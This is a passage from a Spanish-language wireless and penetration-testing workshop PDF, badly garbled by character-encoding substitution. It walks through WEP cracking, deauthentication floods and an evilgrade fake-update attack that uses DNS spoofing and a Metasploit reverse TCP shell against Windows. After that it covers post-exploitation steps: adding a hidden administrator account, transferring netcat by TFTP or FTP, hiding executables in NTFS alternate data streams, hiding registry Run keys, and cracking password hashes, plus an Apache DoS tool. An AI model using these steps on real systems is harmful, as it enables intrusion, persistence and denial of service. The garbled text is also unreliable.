D9 ta5ues -tacar >bjetivo49 Crac/ear -,enu Crac/earA9 uto -(uscar e+ utomaticamente9 !esautenticar -!esautenticar del >bjetivoM9 In+ección -,enu de In+ección;9 >pciones van3adas -&tilidades BariasF9 'alir -Cerrar iroscript

^ <

153

Page 154: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 154/260

  "istado de %s >bjetivo

,C CN 'E* %$R %Q ''I!

=9 000(;4AF= =0; >%N -= 0<9 !C0(=M!=0M = $% -F0 F $"NT=0MFD9 !;CMC;D4MA0< $%<$% -F0 M wiiusc49 !;CMC;D4MA00 $%<$% -;F M eduroamA9 000(;00< == $%<$% -;; M wiiusc9 000(;000 == $%<$% -;; M eduroamM9 !;CMC;D4M=0 == $%<$% -;M M eduroam;9 !;CMC;D4M== == >%N -;M == wiiusc-webF9 000(;00= == >%N -;M == wiiusc-web

=09 00==ECA<(;0 == >%N -;A == wiiusc-web==9 <4!EC;AMM!0 = $%<$% -; M eduroam=<9 <4!EC;AMM!D = $%<$% -; M wiiusc=D9 00==ECA<(;< == $%<$% -;A M eduroam=49 00==ECA<(;= == $%<$% -; M wiiusc=A9 <4!EC;AMM!= = >%N -;A == wiiusc-web=9 00==ECA<A= == >%N -;4 == wiiusc-web=M9 00==ECA<A0 == $%<$% -;A M eduroam=;9 00==ECA<AD == $%<$% -;4 M wiiusc=F9 00==EF0EFD = $%<$% -;= M wiiusc<09 00==EF0EF0 = $%<$% -;< M eduroam<=9 !;CMC;D4MM0< == $%<$% -;< M wiiusc<<9 00==EF0EF= = >%N -;= == wiiusc-web<D9 !;CMC;D4MM0= == >%N -;= == wiiusc-web<49 !;CMC;D4MM00 == $%<$% -;= M eduroam<A9 00==E4!A<FD = $%<$% -MF M wiiusc<9 00==E4!A<F= = >%N -MA == wiiusc-web<M9 00==E4!A<F0 = $%<$% -MM M eduroam<;9 00==E;C!D $%<$% -MA M wiiusc

<F9 00==E;C!= >%N -MA == wiiusc-webD09 00==E;C!0 $%<$% -M4 M eduroamD=9 !;CMC;AEA<< = $%<$% -M4 M eduroamD<9 !;CMC;AEA<0 = >%N -MA == wiiusc-webDD9 !;CMC;AEA<= = $%<$% -M4 M wiiuscD49 <4!EC;AMM(= = >%N -AF == wiiusc-webDA9 <4!EC;AMM(0 = $%<$% -AM M eduroamD9 <4!EC;AMM(D = $%<$% -AM M wiiuscDM9 !;CMC;0(DM;= =A; >%N -= 0

154

Page 155: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 155/260

  'elecciona >bjetivo^

Airo!cript .i$i!la'

Es un script basado en la suite aircrac/-ng) con el 5ue podremos reali3ar todos los ata5ues de dic7a suite de una manera automática 8sin introducir unsolo comando9."o primero 5ue encontramos) al abrir el script) es la pantalla en la 5ue nospide elegir la interace) 5ue 5ueremos montar en modo monitor. Elegimos la5ue nos interese + Fenter

'eguidamente elegimos los drivers para nuestro tipo de adaptador)normalmente elegiremos la opción = 8compat wireless9.

 7ora +a estamos en el men:) propiamente dic7o de airoscript) como veis esmu+ intuitivo) as2 5ue daremos una e#plicación rápida.

, Scanear + 'eleccionando G=H nos llevara a otra pantalla en la 5ue nospedirá 5ue tipo de cirado es el 5ue 5ueremos escanear) wep) wpa) sin iltros8todas las redes9 etc. Y despu6s si 5ueremos un canal concreto o todos. Eneste caso elegimos wep + un canal concreto) para 5ue solo muestre mi red +por 5u6 para los otros cirados) en este manual) usaremos otras7erramientas.

155

Page 156: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 156/260

&na ve3 5ue nos muestre la red 5ue vamos a auditar) cerraremos estaventana pulsando Fctrd Y C* !eleccionar+ 'eleccionando G<H nos abrirá otra ventana en la 5ue nosmostrara todas las redes disponibles 85ue cumplan el patrón de cirado 5ue

elegimos anteriormente9 + en la parte de abajo la ,C de los clientesconectados) en caso de 5ue los 7ubiera. (astará con poner el n:mero de lanuestra + pulsar Fenter.!espu6s nos abrirá una nueva ventana en la 5ue nos pedirá) si 5ueremosutili3ar un cliente conectado al % para reali3ar el ata5ue o no. En nuestrocaso diremos 5ue s2) +a 5ue vamos a utili3ar un D 8ata5ue deragmentación9.

atacar+ 'eleccionando GDH nos abrirá el men: con todos los ata5uesdisponibles 8como veis son los de la suite aicrac/-ng9 nosotros elegiremos D

como 7e dic7o antes. Este proceso ejecutara automáticamente un =8autentiicación alsa9 D 8ragmentación9 + abrirá airodump-ng para capturar los pa5uetes de la red seleccionada.

Cuando tengamos el pa5uete K>R) comen3ara la in+ección automática depa5uetes + en ese momento observaremos 5ue los GdatasH de airodump-ngsuben a velocidades de v6rtigo.Cuando tengamos una cantidad de pa5uetes suicientes 8depende del tipo dered9 iremos a la ventana de airoscript + seleccionaremos G4H cra5uear 'INCERRR " BEN1N' N1ERI>RE' airodump-ng etc. Nos enviara a otra

ventana en la 5ue tendremos 5ue elegir el arc7ivo de claves 5ue probará

156

Page 157: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 157/260

 ircrac/-ng) en este punto tendr6is 5ue aportar algo de conocimiento en eltipo de redes e#istente) +a 5ue dependiendo la opción 5ue elijamos)tendremos más o menos 6#ito.Ej.'i la red es una $"NT=<D4 tendremos 5ue elegir la opción de

$"NKKKK + nos bastaran unos cuantos datas para obtener la clave por deecto) en caso de 5ue nuestra red tenga la clave cambiada o el E''I!)elegiremos ircrc/-%1$ + en este caso necesitaremos en torno a A0)000datas

'i elegimos la opción correcta + tenemos los GdatasH necesarios) nosmostrara la clave en color rojo) en caso contrario nos dirá 5ue probemoscuando tengamos más GdatasH 8iviXs9Este es todo el proceso) pero os vo+ a 7ablar del men: opciones) 5ue no sesuele mencionar en ning:n manual 5ue 7e visto + nos a+uda a conigurar el

ata5ue de una manera óptima.Nos vamos a centrar en las opciones 4)A))M) +a 5ue las otras no 7ace altae#plicarlas.9pci"n ;+ Cambiar ,CCon esta opción) podremos cambiar la ,C de nuestra interace) mu+ :til enalgunas ocasiones.9pci"n + Cambiar rate

 l abrirlo encontramos) 5ue nos da a elegir entre =)<)A)auto) si estamos lejosdel ap o 7a+ muc7o ruido elegiremos la opción =,. %or deecto viene en A,.

9pci"n Q+ Cambiar ppsEste es el ratio de in+ección 5ue seguirá nuestra interace) cuandorealicemos un ata5ue. %or deecto viene posicionado en D00pps + lo podr6iscambiar seg:n las caracter2sticas de vuestro adaptador wii + la red 5ueest6is auditando. &n valor mu+ alto 7ará 8si todas las partes lo soportan9 5uela in+ección de pa5uetes por segundo sea mu+ alta) pero corremos el riesgode 5ue se pierdan la mitad de los pa5uetes) con lo 5ue el ata5ue será máslento. "o ideal será 5ue encontr6is el e5uilibrio entre eiciencia + velocidad.9pci"n O+ Cambiar tiempo de des autentiicación

En esta opción podr6is poner el tiempo 5ue estar6is des autentiicando a uncliente 8o a todos9 en el % seleccionado. 'i seleccionemos G0H estaremos7aciendo un ata5ue sin in) con lo 5ue se podrá entender como un ata5ue!!>' al router victima 8denegación de servicio ilimitado9.Go!cript#eperramienta basada en la suite ircrac/-ng para la e#plotación devulnerabilidades en el cirado $E%.'u uso es mu+ simple) al ejecutar la 7erramienta) lo primero 5ue nos pide) esseleccionar la interace 5ue 5ueremos montar en modo monitor.

157

Page 158: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 158/260

Page 159: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 159/260

Note t7e brute orce - switc7 is obligator+.*ENER" >%1I>N'--dnsserver ]server^

&se t7is !N' server or ) N' and ,K 5ueries.

--enum '7ortcut option e5uivalent to --t7reads A -s <0 -w.-7) --7elp %rint t7is 7elp message.--noreverse '/ip t7e reverse loo/up operations.--private '7ow and save private ips at t7e end o t7e ile

domainTips.t#t.--subile ]ile^ $rite all valid subdomains to t7is ile.-t) --timeout ]value^ 17e tcp and udp timeout values in seconds 8deault

=0s9.--t7reads ]value^ 17e number o t7reads t7at will perorm dierent

5ueries.

-v) --verbose (e verbose s7ow all t7e progress and all t7e error messages.*>>*"E 'CR%IN* >%1I>N'-p) --pages ]value^ 17e number o google searc7 pages to process w7en

scraping names)t7e deault is <0 pages) t7e -s switc7 must be speciied.

-s) --scrap ]value^ 17e ma#imum number o subdomains t7at will bescraped rom *oogle.(R&1E >RCE >%1I>N'-) --ile ]ile^ Read subdomains rom t7is ile to perorm brute orce.-u) --update ]agr3^

&pdate t7e ile speciied wit7 t7e - switc7 wit7 valid subdomains.a 8all9 &pdate using all results.g &pdate using onl+ google scraping results.r &pdate using onl+ reverse loo/up results.3 &pdate using onl+ 3onetranser results.

-r) --recursion Recursion on subdomains) brute orce all discovredsubdomains t7at 7ave an N' record.$>I' NE1RN*E >%1I>N'

-d) --dela+ ]value^ 17e ma#imum value o seconds to wait betweenw7ois 5ueries) t7e value is deined randoml+) deault Ds.-w) --w7ois %erorm t7e w7ois 5ueries on c class networ/ ranges.

 $arning t7is can generate ver+ large netranges and it willta/e lot o time to perorme reverse loo/ups.REBER'E ">>&% >%1I>N'-e) --e#clude ]rege#p^

E#clude %1R records t7at matc7 t7e rege#p e#pression romreverse loo/up results) useul on invalid 7ostnames.>&1%&1 >%1I>N'

159

Page 160: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 160/260

  -o --output ]ile^ >utput in K," ormat. Can be imported in ,agic1ree8www.gremwell.com9

E@ilgraderamewor/ modular 5ue sirve undamentalmente para obtener el control dee5uipos usando actuali3aciones alsas + cargando un pa+load.El ramewor/ uncionará sólo cuando el atacante sea capa3 deredireccionarse el tráico de la v2ctima) +a sea modiicando las entradas !N')envenenando el cac76 !N') alseando R%) impersonando el punto deacceso $ii) secuestrando !C% o a trav6s de cual5uier otro medio omanera.!e esta orma) es posible tomar el control de un má5uina completamenteparc7eada en un test de intrusión. "a idea principal es demostrar los allos

5ue e#isten 7o+ en d2a en los procesos de actuali3ación de la ma+or2a de lasaplicaciones.%od6is ver una demo con una alsa actuali3ación Oava a5ui7ttp??www.inob+tesec.com?demo?javaTwinM.7tm 

 l iniciar el programa nos aparece lo siguiente T T T8T9

 TTTTT TTT TT T T TT TT T TT TTT? T ? ? ? T VTT? T ? T ? T

TT? B ? 8T 8T 8T TT?TTT T? TTTT) T TT)TTT)TTTT

 TT? TTT?

---------------------------------------------------------------- www.inob+tesec.com - M modules available.

evilgrade^

Como hac7ear .indo#! con E@ilgrade Bamos a ver un ejemplo de como 7ac/ear windows con una actuali3ación denotepad plus

 brimos evilgrade + ponemosevilgrade^conigure notepadplusConiguramos el agente para crear la s7ell usando mspa+loadevilgrade8notepadplus9^set agent _@?pentest?e#ploits?ramewor/D?mspa+loadwindows?s7ellTreverseTtcp ">'1[=F<.=;.;.F= "%>R1[=<D4 K ^ ]>&1^?tmp?notepadplus.e#e]>&1^@`

160

Page 161: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 161/260

"a e#plicación de los parametros es?pentest?e#ploits?ramewor/D?mspa+load Z^ Cargamos mspa+load.windows?s7ellTreverseTtcp Z^ &samos el pa+load de s7ell tcp inversa dewindows para abrir una s7ell del objetivo una ve3 la operacion tenga 6#ito.

">'1 Z^ local7ost la ip del atacante."%>R1 Z^ localport puerto en el 5ue nos conectamos con la victima cuandola operación tenga 6#ito.

iniciamos el servidorevilgrade8notepadplus9^start89 _,oduletrillian` _$E('ERBER` - 89 ilename .?include?trillian?alerts.p7pdid not e#istsevilgrade8notepadplus9^_=D??<0=4=A4DD` - _!N''ERBER` - !N' 'erver Read+. $aiting or 

Connections ...evilgrade8notepadplus9^

Editamos el arc7ivo etter.dns para redireccionar las las cone#iones paraactuali3ar notepad plus al servidor de evilgrademousepad ?usr?s7are?ettercap?etter.dnsnotepad-plus.sourceorge.net =F<.=;.=.D0!onde =F<.=;.=.D0 es la ip del servidor de evilgrade

Coniguramos Ettercap para 7acer un ata5ue ,itm brimos Ettercap'ni Z^ &niied sniing - 'elecionamos el interace 8wlan0 en nuestro caso9%lugins Z^ ,anage t7e plugins Z^ !oble clic/ dnsTspooosts Z^ 'can or 7ostsip del router - dd to target =ip del objetivo - dd to target <,itm Z^ rp poisoning Z^ marcamos @'ni remote connection@'tart Z^ start sniing

 7ora vamos a usar Netcat para escuc7ar en el puerto del servidor 5ueconiguramos de evilgrade 8puerto =<D4 en nuestro caso9netcat -l -v -p =<D4las opciones son-l escuc7a cual5uier cone#ión entrante-v verbose-p escuc7a de puertos activada

Cuando el usuario abra Notepad %lus le abrira una ventana para descargar einstalar la actuali3ación.

161

Page 162: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 162/260

'i el usuario le da a aceptar en la terminal donde esta ejecutandose netcatse nos abrira una s7ell ,s-dos del e5uipo objetivoc%rogram ilesNotepadhhupdater^%or lo 5ue +a tenemos el control del e5uipoPP

 7ora vamos a ver algunos ejemplos de lo 5ue podemos 7acer en el e5uipode la victima

Como u!ar el !hell remoto m!do! del o3Jeti@o

Estamos limitados por el 7ec7o de 5ue este es un @s7ell no interactivo @ .'upongo 5ue la manera más ácil de e#plicar lo 5ue es un s7ell no interactivo

es con un ejemplo .= brimos un s2mbolo del !>' en un e5uipo con $indows K%. Escribimosel comando @dir@ . Este comando no es interactivo ) +a 5ue no re5uiere laintervención del usuario para completar su tarea.< !esde un indicador del !>' nos conectamos a un servidor 1% usando elcliente nativo de $indows. Iniciamos la sesión) + luego salimos con elcomando @b+e @ .>bserve el proceso de 1% 7a salido correctamente despu6s del comando@b+e @ es enviado .Este es un programa interactivo 5ue re5uiere la intervención del usuario conel in de uncionar correctamente + completa ."a regla básica cuando se trata de s7ells no interactivo es @No utiliceprogramas interactivos @"a salida de un programa interactivo ) a menudo no se redirigecorrectamente al s7ell remoto.&na buena manera de probar esta teor2a a cabo ser2a la de utili3ar elprograma de 1% desde un s7ell no interactivo ) como un s7ell remoto .

 s2 5ue a7ora 5ue 7emos tenemos claro los comandos 5ue podemos + no

podemos usar ) vamos a seguir adelante con las actividades 5ue un atacantepodr2a 7acer!esde nuestra s7ell de comandos remoto ) el siguiente paso lógico ser2aampliar nuestro ata5ue con la carga de arc7ivos como los registradores declaves ) el uso de e#ploits + tro+anos.%odemos usar varios m6todos a trav6s de la consola de comandos .

Como crear un u!uario con pri@ilegio! de admini!tradorC$IN!>$'s+stemD< ^ admin net user =<D4A ? addadmin net user =<D4A ? add

162

Page 163: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 163/260

El comando se 7a completado satisactoriamente.C$IN!>$'s+stemD< ^ net localgroup administradores loneerret ? addnet localgroup administradores loneerret ? aadirEl comando se 7a completado satisactoriamente.

&suarios de la red $IN!>$' s+stemD< ^ usersv neto C"as cuentas de usuario de v --------------------------- dministrador del invitado elpssistantadmin '&%%>R1TMDDM4Aa0C$IN!>$'s+stemD< ^

Como u!ar T/T4

&n cliente de transerencia de arc7ivos basado en &!% se instala por deecto

en todos los sistemas $indows K% + está disponible desde la l2nea decomandos .%odemos transerir arc7ivos 7acia adelante + atrás nuestra v2ctima utili3andoeste m6todo.En primer lugar necesitamos tener acceso a un servidor 11%%odemos instalar + conigurar acilmente un servidor 11% en un linu#basado en !ebian 8para 7acerlo en $iisla# tendriamos 5ue instalar elmodulo de ttp9

 brimos la terminal + ponemos el siguiente comando.sudo apt-get install #inetd ttpd ttpCrear el arc7ivo ?etc?#inetd.d?ttpCon lo siguienteservice ttpprotocol [ udpport [ Fsoc/etTt+pe [ dgramwait [ +esuser [ nobod+

server [ ?usr?sbin?in.ttpdserverTargs [ ?ttpbootdisable [ noCreamos la carpeta ?ttpboot + cambiamos los permisossudo m/dir ?ttpbootsudo c7mod -R MMM ?ttpbootsudo c7own -R nobod+ ?ttpbootCopiamos los arc7ivos a compartir en la carpeta ?ttpboot%ara iniciar el servidor abrimos un terminal + ponemos

163

Page 164: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 164/260

sudo ?etc?init.d?#inetd restart

Bamos a7ttp??joncraton.org?blog?4?netcat-or-windows? 

!escargamos netcat) descomprimimos + lo ponemos en la carpeta ?ttpboot%ara transerir el ejecutable de netcat 8nc.e#e9 al e5uipo objetivo usando ttpen la s7ell remota ponemosC $IN!>$'s+stemD< ^ ttp -i =F<.=;.0.=00 *E1 nc.e#ettp -i =F<.=;.0.=00 *E1 nc.e#e1raserencia con 6#ito AFDF< (+tes A segundos ) ==);M; b+tes ? sC $IN!>$' s+stemD< ^ dir nc.e#edir nc.e#eBolumen en la unidad C no tiene eti5ueta .

- MDDM 0EN volumen n:mero de serie se!irectorio de C$IN!>$'s+stemD<=;?0A?<0=0 04F , AFDF< nc.e#e= rc7ivo 8 s 9 AF)DF< b+tes0 !ir 8 s 9 <MDD4FF b+tes libresC$IN!>$'s+stemD< ^

'iendo transerencia &!% ) una ve3 5ue debe tener en cuenta algunascosas. En primer lugar es inestable ) por lo 5ue la transerencia de arc7ivosde gran tamao no es una buena idea. 1ambi6n a veces el tráico &!%saliente es blo5ueado por irewalls corporativos .

  continuación tenemos 1%

En nuestro ejemplo anterior el tratamiento de la @s7ell no interactivo @ )descubrimos 5ue los programas interactivos no se pod2an utili3ar de ormaiable desde un s7ell remoto. s2 5ue por 5u6 estamos considerando 1% S(ueno) por5ue el cliente 1% puede ser automati3ado a trav6s de un arc7ivode te#to L usandolo esencialmente como un programa no interactivo."ectura a trav6s del comando 1% a+uda tenemos - s nombre de arc7ivo

Especiica un arc7ivo de te#to 5ue contiene comandos de 1% L loscomandos se ejecutará automáticamente despu6s de inicia 1%.

En el s7ell de la v2ctima) tenemos 5ue nuestro cliente 1% 5ue trabaja sólocon los comandos no interactivos usando un arc7ivo de te#to.%ara ello usamos los siguiente comandosC$IN!>$'s+stemD< ^ ec7o abierta =F<.=;.0.=00 <=^ tp.t#tC$IN!>$'s+stemD< ^ tp &'&RI> eco ^^ tp.t#tC$IN!>$'s+stemD< ^ ec7o tp %'' ^^ tp.t#tC$IN!>$'s+stemD< ^ bin ec7o ^^ tp.t#t

164

Page 165: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 165/260

C$IN!>$'s+stemD< ^ ec7o *E1 nc.e#e ^^ tp.t#tC$IN!>$'s+stemD< ^ ec7o b+e ^^ tp.t#t

&na ve3 creado nuestro ic7ero ) ejecutamos el cliente de 1% mediante con

la opción @- s@ + entonces +a no se considera @interactivo@C $IN!>$' s+stemD< ^ tp - s tp.t#t>tro m6todo ) 5ue es un poco más e#trao ) es simplemente copiar + pegar el arc7ivo desde la má5uina de ata5ue a la s7ell remota .El m6todo re5uiere las 7erramientas ,' -!>' @debug.e#e@ + @e#e<bat.e#e@'i estamos usando "inu# tenemos 5ue tener wine instalado.!esde el e5uipo del agresor con "inu# + wine abrimos un terminal +ponemos wine e#e<bat.e#e nc.e#e nc.t#t

Este comando copia el b+tecode 7e#agonal 5ue se encuentra en @ nc.e#e @ )+ lo guarda en nuestro arc7ivo de te#to Gnc.t#tH. El arc7ivo es construido detal manera 5ue podemos simplemente copiar + pegar su contenido en ele5uipo de la v2ctima acilmente. !espu6s de 5ue se trata de una cuestión deejecutarlo con la unción @debug.e#e@ de ,' -!>'. !ebug.e#e +a no seinstala por deecto en los nuevos e5uipos con $indows por lo 5ue si no estainstalado debemos copiarlo al e5uipo de la v2ctima.

ADS o NT/S Alternate Data Stream!

"a capacidad de desembolsar los datos en arc7ivos e#istentes ) sin modiicar su uncionalidad o tamao) es algo 5ue puede ser interesante para unatacante . >riginalmente concebido para ser compatible con el sistema dearc7ivos de ,acintos7 ) esta capacidad N1' tambi6n se puede utili3ar paraocultar arc7ivos maliciosos en el e5uipo de la v2ctima . e a5u2 un buenejemplo

Ctemp^ dirBolumen en la unidad C no tiene eti5ueta .

- MDDM 0EN volumen n:mero de serie se!irectorio de Cmuts

=;?0A?<0=0 =<A p !IR .=;?0A?<0=0 =<A p !IR ..=;?0A?<0=0 =<AA p AF)DF< nc.e#e= rc7ivo 8 s 9 AF)DF< b+tes< !ir 8 s 9 D==4DFD0 b+tes libres

Ctemp^ ec7o @7ola ) so+ el te#to en un arc7ivo de te#to @^ te#to.t#t

165

Page 166: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 166/260

Ctemp^ dirBolumen en la unidad C no tiene eti5ueta .- MDDM 0EN volumen n:mero de serie se!irectorio de Ctemp

=;?0A?<0=0 =<A p !IR .=;?0A?<0=0 =<A p !IR ..=;?0A?<0=0 =<A p DD te#to.t#t=;?0A?<0=0 =<AA p AF)DF< nc.e#e< rc7ivo 8 s 9 AF)4<A b+tes< !ir 8 s 9 D==4DFD0 b+tes libresCtemp^ t+pe nc.e#e ^ te#to.t#tnc.e#e vCtemp^ del nc.e#e

Ctemp^ dirBolumen en la unidad C no tiene eti5ueta .- MDDM 0EN volumen n:mero de serie se!irectorio de Ctemp^

=;?0A?<0=0 =<A p !IR .=;?0A?<0=0 =<A p !IR ..=;?0A?<0=0 =<A p DD te#to.t#t= arc7ivo 8 s 9 DD b+tes< !ir 8 s 9 D==4DFD0 b+tes libres

Ctemp^ start .?te#to.t#tnc.e#eCtemp^

Como puede ver ) el tamao del arc7ivo de salida de te#to no 7a cambiado +5ue todav2a son capaces de ejecutar @ netcat @ . >cultar arc7ivos ejecutablesen arc7ivos de te#to es bastante com:n. ,uc7os tro+anos como$inD<.ido.i7 utili3an t6cnicas similares ) pero al inal del d2a tener ejecutables ocultos en arc7ivos de te#to nunca es una buena seal. Ounto

con las claves de registro ocultas ) un 7ac/er con un s7ell remoto puede7acer muc7o dao .

ablando de claves de registro ocultas ...

Como ocultar la! cla@e! del Regi!tro

Editor del Registro de ,icrosot 8<000 - K%9 tiene un deecto de diseo . Esteallo permite a un usuario crear entradas ocultas 8+ utili3ables 9 en el registro

166

Page 167: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 167/260

de una má5uina. Incluso un e5uipo con todos los parc7es + actuali3ado con$indows K% todav2a tiene este deecto .%asos a seguir  = Ejecutar RegeditD<.e#e + crear un nuevo valor de cadena en

", '>1$RE ,icrosot $indows CurrentBersion Run< "lene esta llave con una cadena de <A; caracteres.D Crear otro valor de cadena llamado @ calc.e#e @ + asignarle el @ calc.e#e

@ string asta a7ora) usted debe tener algo 5ue se parece a esto4 7ora presione @A @ para actuali3ar ) + si todo va bien ambas teclas

desaparece por arte de magia .A Cierre la sesión + vuelva a iniciar sesión ) usted debe conseguir una

calculadora. 8 usted puede 5uitar las llaves del s7ell de comandos utili3andoreg delete 9

$indmha!h+p'cript p+t7on para crac/ear los distintos 7as7es usando servicios onlinegratuitos

 l iniciar el script podemos ver como se usa + las opciones disponibles

?usr?bin?indm+7as7Tv=.=.<.p+ =.=.< 8 7ttp??code.google.com?p?indm+7as7? 9

&sage------p+t7on ?usr?bin?indm+7as7Tv=.=.<.p+ ]algorit7m^ >%1I>N'

 ccepted algorit7ms are------------------------

,!4 - RC =D<0,!A - RC =D<='= - RC D=M4 8I%' =;0-D9'<<4 - RC D;M4 8I%' =;0-D9'<A - I%' =;0-D

'D;4 - I%' =;0-D'A=< - I%' =;0-DR,!=0 - RC <;AM*>'1 - RC A;D=$IR"%>>" - I'>?IEC =0==;-D<004", - ,icrosot $indows 7as7N1", - ,icrosot $indows 7as7,Y'Q" - ,+'Q" D) 4) A 7as7CI'C>M - Cisco I>' t+pe M encr+pted passwordsO&NI%ER - Ouniper Networ/s F encr+pted passwords

167

Page 168: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 168/260

  "!%T,!A - ,!A (ase4 encoded"!%T'= - '= (ase4 encoded

N>1E or ", ? N1", it is recommended to introduce bot7 values wit7 t7is

ormatp+t7on ?usr?bin?indm+7as7Tv=.=.<.p+ ", -7FaAM0<A<bM4AAdeaadDb4DAbA=404ee0dM=<bdeaceAM4de=;ca;AbA;aMp+t7on ?usr?bin?indm+7as7Tv=.=.<.p+ N1", -7FaAM0<A<bM4AAdeaadDb4DAbA=404ee0dM=<bdeaceAM4de=;ca;AbA;aM

Balid >%1I>N' are------------------

-7 ]7as7Tvalue^ I +ou onl+ want to crac/ one 7as7) speci+ its value wit7t7is option.

- ]ile^ I +ou 7ave several 7as7es) +ou can speci+ a ile wit7 one 7as7per line.

N>1E ll o t7em 7ave to be t7e same t+pe.-g I +our 7as7 cannot be crac/ed) searc7 it in *oogle and s7ow all

t7e results.N>1E 17is option >N"Y wor/s wit7 -7 8one 7as7 input9 option.

E#amples---------

-^ 1r+ to crac/ onl+ one 7as7.p+t7on ?usr?bin?indm+7as7Tv=.=.<.p+ ,!A -70F;bcd4<=dDMDcade4e;D<<Mb4

-^ 1r+ to crac/ a O&NI%ER encr+pted password escaping special c7aracters.

p+t7on ?usr?bin?indm+7as7Tv=.=.<.p+ O&NI%ER -7 @F"bK-wg4@

-^ I t7e 7as7 cannot be crac/ed) it will be searc7ed in *oogle.p+t7on ?usr?bin?indm+7as7Tv=.=.<.p+ "!%T'= -7@'cR!tpNCe(i5lA>QsB+r0si[@ -g

-^ 1r+ to crac/ multiple 7as7es using a ile 8one 7as7 per line9.p+t7on ?usr?bin?indm+7as7Tv=.=.<.p+ ,Y'Q" - m+s5l7as7esile.t#t

Contact

168

Page 169: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 169/260

--------

_$eb` 7ttp??la#marcaellugar.blogspot.com? _,ail?*oogleh` blogla#marcaellugarfgmail.com 

_twitter` flaKmarcaellugar

7illapacheerramienta para 7acer ata5ues de denegacion de servicios a servidores

 pac7e. l iniciarla nos muestra como se usa + un ejemplo pac7e Remote !enial o 'ervice 8memor+ e#7austion9b+ ingcope

usage perl ?usr?bin?/illapac7e.pl ]7ost^ _numor/s`e#ample perl ?usr?bin?/illapac7e.pl www.e#ample.com A0

9phcrac7erramienta para crac/ear las contraseas de $indows.

169

Page 170: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 170/260

Como paso previo tenemos 5ue e#traer la ', de $indows!escargamos gdump de7ttp??oous.net?goons?i33gig?gdump?downloads.7tm 'eguimos la guia de esta web7ttp??www.7ac/times.com?contrasenasTdeTwindows? 

4rimer pa!o 

Bamos a preerencias %reerencias + en Number o 17reads ponemos'i tenemos procesador de = nucleo <'i tenemos procesador Core < !uo D'i tenemos procesador Core < Quad A'i se cambia este valor ) tenemos 5ue salir de >p7crac/ + reiniciarlo con elin de guardar el cambio.'i no sale + reinicia ) no se tendrá el nuevo n:mero de 7ilos en cuenta por elprograma.

170

Page 171: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 171/260

Segundo pa!oBamos a "oad - Encr+pted ',"a ', se encuentra en el directorio C$indowss+stemD<conig + sólo sepuede acceder a una partición de $indows 5ue no se está ejecutando .

%ara el ', local + las opciones ', remoto) debe iniciar sesión conderec7os de administrador en el e5uipo 5ue desea volcar el ', .

Tercer pa!o(orrar con el botón Eliminar todas las cuentas de usuario 5ue no estáinteresado en 8por e#emple la cuenta de invitado 9 .%odemos utili3ar la tecla Ctrl para reali3ar una selección m:ltiple . Ctrl-aseleccionará cada 7as7 cargado.1enga en cuenta 5ue el tiempo necesario para romper 7as7es decontraseas con tablas de arco iris es proporcional al n:mero de 7as7es

cargados. Con un ata5ue de uer3a bruta el momento de cra5ueo nodepende del n:mero de 7as7es cargados. Es por eso 5ue es recomendablepara eliminar cual5uier cuenta de usuario innecesaria con el botón Eliminar.

Cuarto pa!oInstalar 8 botón 1ablas 9 ) active 8verde + botones de color amarillo 9 + unaespecie inteligente 8 lec7as arriba + abajo 9 las tablas Rainbow 5ue vamos autili3ar .El almacenamiento de las tablas del arco iris en un medio rápido) como undisco duro acelerará considerablemente el proceso de crac/eo.

 5u2 7a+ algunas pautas'i 5uieres romper 7as7es ", como se encuentra en $indows K% por deecto8 la columna de la ", as7 nunca está vac2a de la ventana principalop7crac/ 9 ) primero instalar + 7abilitar +a sea la tabla K% ree small 8sitenemos menos de A=< ,( de memoria R, libre 9 o el K% ree ast 8sitenemos más de A=< ,( de memoria R, libre 9.N> permitir marcar ambos +a 5ue se trata es in:til + se ralenti3ará el procesode cra5ueo .

